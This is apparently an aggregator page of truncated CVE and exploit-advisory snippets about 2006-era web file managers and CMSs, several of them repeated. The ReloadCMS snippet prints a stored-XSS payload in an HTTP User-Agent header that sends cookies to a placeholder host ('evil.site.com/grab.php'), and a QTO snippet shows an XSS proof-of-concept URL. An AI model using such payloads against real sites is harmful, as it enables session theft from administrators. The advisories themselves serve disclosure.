CVE-2006-6256

Cross-site scripting XSS vulnerability in the file manager in admin/bromain.php in AlternC 0.9.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a folder name...

CVE-2006-6257

The CVE-2006-6257 issue affects AlternC 0.9.5 and earlier, where PHP warning messages disclose sensitive path information when folder names include JavaScript-like strings. The root cause is information leakage via warning output, enabling remote attackers to learn partial path details. Impact is...

CVE-2006-6256

CVE-2006-6256 concerns a Cross-site Scripting (XSS) vulnerability in the file manager (admin/bro_main.php) of AlternC 0.9.5 and earlier. The flaw allows remote attackers to inject arbitrary web script or HTML via a folder name. Affected software is AlternC, up to version 0.9.5 (older). The connec...

simple file manager 0.24a - Multiple Vulnerabilities

simple file manager 0.24a - Multiple Vulnerabilities /\ | flame vrs Simple File Manager | | http://onedotoh.sourceforge.net/ | | Various Vulnerbilities Including: | / /+++++++++++++++++++++++++++++++++++++++++++\ | Using the scripts supplied by the webapp: | | Reading of Arbitrary files | |...

Simple File Manager 0.24a Multiple Remote Vulnerabilities

Exploit for unknown platform in category web applications ========================================================= Simple File Manager 0.24a Multiple Remote Vulnerabilities ========================================================= /\ | flame vrs Simple File Manager | |...

simple file manager 0.24a - Multiple Vulnerabilities

/\ | flame vrs Simple File Manager | | http://onedotoh.sourceforge.net/ | | Various Vulnerbilities Including: | / /+++++++++++++++++++++++++++++++++++++++++++\ | Using the scripts supplied by the webapp: | | Reading of Arbitrary files | | Deletion of Arbitrary files | | Modification of Arbitrary...

CPanel Multiple Cross Site Scription

Aria-Security Team Advisory www.Aria-security.Com For English www.Aria-Security.net For Persian Original Advisory : http://aria-security.net/advisory/cpanel.txt ----------------------------------------------------------- Software: CPanel Tested On CPanel 10 CPanel file Manager: PoC:...

CVE-2006-4268

CubeCart

CVE-2006-3362

Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in 1 Geeklog 1.4.0 through 1.4.0sr3, 2 toendaCMS 1.0.0 Shizouka Stable and earlier, 3 WeBid 0.5.4, and possibly other products, when installed on Apache with modmime, allows remote...

QTO File Manager 1.0 - Multiple Cross-Site Scripting Vulnerabilities

source: https://www.securityfocus.com/bid/18791/info QTO File Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before displaying it to users of the application. An attacker may leverage these issues to have arbitrary scrip...

qtofm.txt

+vendor : http://www.qto.com +poral : qto file manager +version : All version ! Exploit: +http://www.xxx.xom/qto/index.php?msg=xss...

CVE-2006-3160

Cross-site scripting XSS vulnerability in fm.php in ONEdotOH Simple File Manager SFM 0.24a and earlier allows remote attackers to inject arbitrary web script or HTML via the msg parameter...

CVE-2006-3160

The CVE-2006-3160 entry describes a Cross-Site Scripting (XSS) vulnerability in ONEdotOH Simple File Manager (SFM) up to version 0.24a, specifically in fm.php where the msg parameter can be leveraged to inject arbitrary script/HTML. The vulnerability affects the fm.php component and arises from i...

CVE-2006-3160

Cross-site scripting XSS vulnerability in fm.php in ONEdotOH Simple File Manager SFM 0.24a and earlier allows remote attackers to inject arbitrary web script or HTML via the msg parameter...

ReloadCMS-1.2.5.txt

nc target.host.com 80 GET /pathtoreloadcms/ HTTP/1.0 User-Agent: "window.open"http://evil.site.com/grab.php?c="+document.cookie+"&ref="+document.URL;window.close; Host: target.host.com Connection: Close So, when admin see site statistics through the administration panel, javascript will run Once...

ReloadCMS <= 1.2.5stable Cross site scripting / remote command execution

?php / ReloadCMS = 1.2.5stable Cross site scripting / remote command execution software site: http://reloadcms.com/ description: "ReloadCMS is a free CMS written on PHP and based on flat files." vulnerability: ReloadCMS do not properly sanitize User-Agent request header before to store it in...

Qto File Manager 1.0 - index.php Cross-Site Scripting

Qto File Manager 1.0 - index.php Cross-Site Scripting source: https://www.securityfocus.com/bid/18510/info Qto file manager is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this...

Qto File Manager 1.0 - 'index.php' Cross-Site Scripting

source: https://www.securityfocus.com/bid/18510/info Qto file manager is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code execute in the...

xinnet. com China new network Web Mail system has a serious vulnerability-a vulnerability warning-the black bar safety net

Long time no Post garbage come up, this also is not prepared to contribute, to the octal friend. First good luck to all octal friends a Happy New Year. Everyone knows China's famous New cafe, new network virtual host in a stable and secure known. Business users very much, I also bought a new...

Cross site scripting

Cross-site scripting XSS vulnerability in the file manager utility in Hummingbird Collaboration aka Hummingbird Enterprise Collaboration 5.21 and earlier allows remote attackers to inject arbitrary web script or HTML in an uploaded page, which is published without a check for hostile scripting...